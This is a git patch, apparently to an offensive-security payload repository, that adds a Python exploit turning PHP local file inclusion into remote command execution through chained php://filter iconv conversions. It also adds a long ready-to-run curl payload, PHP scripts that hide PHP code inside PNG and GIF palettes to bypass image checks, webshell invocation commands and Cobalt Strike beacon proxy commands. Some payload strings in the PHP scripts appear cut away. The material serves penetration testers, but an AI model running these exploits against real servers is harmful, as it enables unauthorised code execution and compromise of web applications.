From fbd7517e047d9b4eed2e169490b4fbd74fa00b92 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 21 Aug 2022 16:38:54 +0200
Subject: [PATCH] LFI2RCE - Picture Compression - SOCKS5 CS
---
File Inclusion/LFI2RCE.py | 60 ++++++++++++++++++
File Inclusion/README.md | 36 ++++++++---
.../Cobalt Strike - Cheatsheet.md | 5 ++
.../GIF_exploit.gif | Bin
.../JPG_exploit-55.jpg | Bin
.../PNG_110x110_resize_bypass_use_LFI.png | Bin
.../PNG_32x32_resize_bypass_use_LFI.png | Bin
.../createBulletproofJPG.py} | 7 +-
.../createCompressedPNG_110x110.php} | 0
.../createGIFwithGlobalColorTable.php | 22 +++++++
.../Picture Compression/createPNGwithPLTE.php | 28 ++++++++
.../Picture Resize/README.txt | 5 --
Upload Insecure Files/README.md | 13 ++--
13 files changed, 157 insertions(+), 19 deletions(-)
create mode 100644 File Inclusion/LFI2RCE.py
rename Upload Insecure Files/{Picture Resize => Picture Compression}/GIF_exploit.gif (100%)
rename Upload Insecure Files/{Picture Resize => Picture Compression}/JPG_exploit-55.jpg (100%)
rename Upload Insecure Files/{Picture Resize => Picture Compression}/PNG_110x110_resize_bypass_use_LFI.png (100%)
rename Upload Insecure Files/{Picture Resize => Picture Compression}/PNG_32x32_resize_bypass_use_LFI.png (100%)
rename Upload Insecure Files/{Picture Resize/exploit_JPG.py => Picture Compression/createBulletproofJPG.py} (97%)
rename Upload Insecure Files/{Picture Resize/exploit_PNG_110x110.php => Picture Compression/createCompressedPNG_110x110.php} (100%)
create mode 100644 Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php
create mode 100644 Upload Insecure Files/Picture Compression/createPNGwithPLTE.php
delete mode 100644 Upload Insecure Files/Picture Resize/README.txt
diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/LFI2RCE.py
new file mode 100644
index 0000000..3943715
--- /dev/null
+++ b/File Inclusion/LFI2RCE.py
@@ -0,0 +1,60 @@
+import requests
+
+url = "http://localhost:8000/chall.php"
+file_to_use = "/etc/passwd"
+command = "id"
+
+#
+base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
+
+conversions = {
+ 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+ 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+ 'C': 'convert.iconv.UTF8.CSISO2022KR',
+ '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+ '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+ 'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+ 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+ 'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+ 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+ 'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+ 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+ '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+ 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+ 'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+ 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
+ 'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+ '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+ '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
+}
+
+
+# generate some garbage base64
+filters = "convert.iconv.UTF8.CSISO2022KR|"
+filters += "convert.base64-encode|"
+# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+filters += "convert.iconv.UTF8.UTF7|"
+
+
+for c in base64_payload[::-1]:
+ filters += conversions[c] + "|"
+ # decode and reencode to get rid of everything that isn't valid base64
+ filters += "convert.base64-decode|"
+ filters += "convert.base64-encode|"
+ # get rid of equal signs
+ filters += "convert.iconv.UTF8.UTF7|"
+
+filters += "convert.base64-decode"
+
+final_payload = f"php://filter/{filters}/resource={file_to_use}"
+
+with open('payload', 'w') as f:
+ f.write(final_payload)
+
+r = requests.get(url, params={
+ "0": command,
+ "action": "include",
+ "file": final_payload
+})
+
+print(r.text)
\ No newline at end of file
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index b1a9170..f6bfef4 100644
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```
-can be chained with a compression wrapper for large files.
+Wrappers can be chained with a compression wrapper for large files.
```powershell
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
@@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`:
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
```
+Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.
+
+```powershell
+# vulnerable file: index.php
+# vulnerable parameter: file
+# executed command: id
+# executed PHP code:
+curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
+```
+
+
### Wrapper zip://
-```python
-echo "" > payload.php;
-zip payload.zip payload.php;
-mv payload.zip shell.jpg;
-rm payload.php
+1. Create an evil payload: `echo "" > payload.php;`
+2. Zip the file
+ ```python
+ zip payload.zip payload.php;
+ mv payload.zip shell.jpg;
+ rm payload.php
+ ```
+3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
-http://example.com/index.php?page=zip://shell.jpg%23payload.php
-```
### Wrapper data://
@@ -175,6 +187,7 @@ NOTE: the payload is ""
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
+
### Wrapper expect://
```powershell
@@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
+
### Wrapper input://
Specify your payload in the POST parameters, this can be done with a simple `curl` command.
@@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack.
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input
```
+
### Wrapper phar://
Create a phar file with a serialized object in its meta-data.
@@ -229,6 +244,7 @@ include('phar://test.phar');
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
+
## LFI to RCE via /proc/*/fd
1. Upload a lot of shells (for example : 100)
@@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent:
```
+
## LFI to RCE via upload
If you can upload a file, just inject the shell payload in it (e.g : `` ).
@@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
+
## LFI to RCE via upload (race)
Worlds Quitest Let's Play"
* Upload a file and trigger a self-inclusion.
@@ -456,3 +474,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
+* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
+* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index affccdb..e84435c 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
@@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
```powershell
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
+beacon > socks [port]
+beacon > socks [port] [socks4]
+beacon > socks [port] [socks5]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]
diff --git a/Upload Insecure Files/Picture Resize/GIF_exploit.gif b/Upload Insecure Files/Picture Compression/GIF_exploit.gif
similarity index 100%
rename from Upload Insecure Files/Picture Resize/GIF_exploit.gif
rename to Upload Insecure Files/Picture Compression/GIF_exploit.gif
diff --git a/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg b/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg
similarity index 100%
rename from Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg
rename to Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg
diff --git a/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png
rename to Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png
diff --git a/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png
rename to Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png
diff --git a/Upload Insecure Files/Picture Resize/exploit_JPG.py b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py
similarity index 97%
rename from Upload Insecure Files/Picture Resize/exploit_JPG.py
rename to Upload Insecure Files/Picture Compression/createBulletproofJPG.py
index 14b8a09..c3e2bbb 100644
--- a/Upload Insecure Files/Picture Resize/exploit_JPG.py
+++ b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py
@@ -1,7 +1,6 @@
#!/usr/bin/python
"""
-
Bulletproof Jpegs Generator
Copyright (C) 2012 Damien "virtualabs" Cauquil
@@ -18,7 +17,11 @@
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
+
+ -------------
+ # How to use
+ b.php?c=ls
+ Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
"""
from __future__ import print_function
diff --git a/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php b/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php
similarity index 100%
rename from Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php
rename to Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php
diff --git a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php
new file mode 100644
index 0000000..d505461
--- /dev/null
+++ b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php
@@ -0,0 +1,22 @@
+";
+$_width=200;
+$_height=200;
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+$im = imagecreate($_width, $_height);
+$_hex=unpack('H*',$_payload);
+
+$colors_hex=str_split($_hex[1], 6);
+
+for($i=0; $i < count($colors_hex); $i++){
+ $_color_chunks=str_split($colors_hex[$i], 2);
+ $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+ imagesetpixel($im,$i,1,$color);
+}
+
+imagegif($im,$_file);
+?>
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php
new file mode 100644
index 0000000..d5abcb7
--- /dev/null
+++ b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php
@@ -0,0 +1,28 @@
+ ";
+$_pay_len=strlen($_payload);
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+
+
+$width=$_pay_len/3;
+$height=20;
+//$im = imageCreateFromPng("existing.png");
+$im = imagecreate($width, $height);
+
+$_hex=unpack('H*',$_payload);
+$_chunks=str_split($_hex[1], 6);
+
+for($i=0; $i < count($_chunks); $i++){
+
+ $_color_chunks=str_split($_chunks[$i], 2);
+ $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+
+ imagesetpixel($im,$i,1,$color);
+
+}
+
+imagepng($im,"example.png");
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Resize/README.txt b/Upload Insecure Files/Picture Resize/README.txt
deleted file mode 100644
index 633f383..0000000
--- a/Upload Insecure Files/Picture Resize/README.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-# How to use
-b.php?c=ls
-
-
-Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 3f5bfba..585939a 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -9,7 +9,7 @@
* [Defaults extensions](#defaults-extensions)
* [Upload tricks](#upload-tricks)
* [Filename vulnerabilities](#filename-vulnerabilities)
- * [Picture upload with LFI](#picture-upload-with-lfi)
+ * [Picture compression](#picture-compression-)
* [Configuration Files](#configuration-files)
* [CVE - Image Tragik](#cve---image-tragik)
* [CVE - FFMpeg](#cve---ffmpeg)
@@ -107,12 +107,16 @@ Also you upload:
- HTML/SVG files to trigger an XSS
- EICAR file to check the presence of an antivirus
-### Picture upload with LFI
+### Picture Compression
-Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
+ - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
+ - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
+ - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
+
### Picture with custom metadata
@@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
-* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
\ No newline at end of file
+* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
\ No newline at end of file